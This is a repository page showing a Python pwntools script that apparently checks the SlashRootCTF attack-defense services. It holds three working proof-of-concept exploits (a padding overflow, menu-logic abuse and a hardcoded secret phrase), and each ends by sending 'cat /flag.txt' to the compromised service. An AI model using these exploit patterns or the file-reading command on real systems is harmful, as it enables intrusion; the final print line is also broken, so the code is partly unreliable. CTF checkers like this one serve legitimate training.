Du kannst nicht mehr als 25 Themen auswählen Themen müssen entweder mit einem Buchstaben oder einer Ziffer beginnen. Sie können Bindestriche („-“) enthalten und bis zu 35 Zeichen lang sein.

100 Zeilen
2.6 KiB

vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
vor 5 Jahren
  1. #! /usr/bin/env python2
  2. from pwn import process, remote
  3. HOST = "192.168.2.20"
  4. TOTAL_TEAMS = 1
  5. FORMAT = "SlashRootCTF"
  6. def poc0(host, port):
  7. with remote(host, port) as p:
  8. p.recvuntil(">")
  9. p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
  10. msg = p.recvuntil(">")
  11. # print(msg)
  12. if "young" in msg:
  13. p.sendline("y")
  14. p.recvuntil(">")
  15. p.sendline("2")
  16. p.recvuntil(">")
  17. p.sendline("4")
  18. p.recvuntil(">")
  19. p.sendline("y")
  20. for _ in xrange(10):
  21. p.recvuntil(">")
  22. p.sendline("99")
  23. p.sendline("cat /flag.txt")
  24. flag = p.recvuntil("}")
  25. # print flag
  26. if FORMAT in flag:
  27. return True
  28. else:
  29. return False
  30. else:
  31. return False
  32. def poc1(host, port):
  33. with remote(host, port) as p:
  34. p.recvuntil(">")
  35. p.sendline("Leo")
  36. p.recvuntil(">")
  37. p.sendline("y")
  38. for _ in range(2):
  39. p.recvuntil(">")
  40. p.sendline("3")
  41. p.recvuntil(">")
  42. p.sendline("0")
  43. if "Who" in p.recvuntil(">"):
  44. return False
  45. p.sendline("y")
  46. p.recvuntil(">")
  47. p.sendline("1")
  48. p.recvuntil(">")
  49. p.sendline("4")
  50. p.recvuntil(">")
  51. p.sendline("y")
  52. for _ in range(10):
  53. p.recvuntil(">")
  54. p.sendline("99")
  55. p.sendline("cat /flag.txt")
  56. flag = p.recvuntil("}")
  57. if FORMAT in flag:
  58. return True
  59. else:
  60. return False
  61. def poc2(host, port):
  62. with remote(host, port) as p:
  63. p.recvuntil(">")
  64. p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
  65. p.recvuntil(">")
  66. p.sendline("y")
  67. p.recvuntil(">")
  68. p.sendline("6")
  69. if "Lv: 1000000" in p.recvuntil(">"):
  70. p.sendline("2")
  71. p.recvuntil(">")
  72. p.sendline("4")
  73. p.recvuntil(">")
  74. p.sendline("y")
  75. for _ in xrange(10):
  76. p.recvuntil(">")
  77. p.sendline("99")
  78. p.sendline("cat /flag.txt")
  79. flag = p.recvuntil("}")
  80. if FORMAT in flag:
  81. return True
  82. else:
  83. return False
  84. else:
  85. return False
  86. if __name__ == "__main__":
  87. for i in range(1, TOTAL_TEAMS+1):
  88. r0 = poc0(HOST, (60004 + (i*100)))
  89. r1 = poc1(HOST, (60004 + (i*100)))
  90. r2 = poc2(HOST, (60004 + (i*100)))
  91. print("Team [{}] {} {} {}" % (i, r0, r1, r2))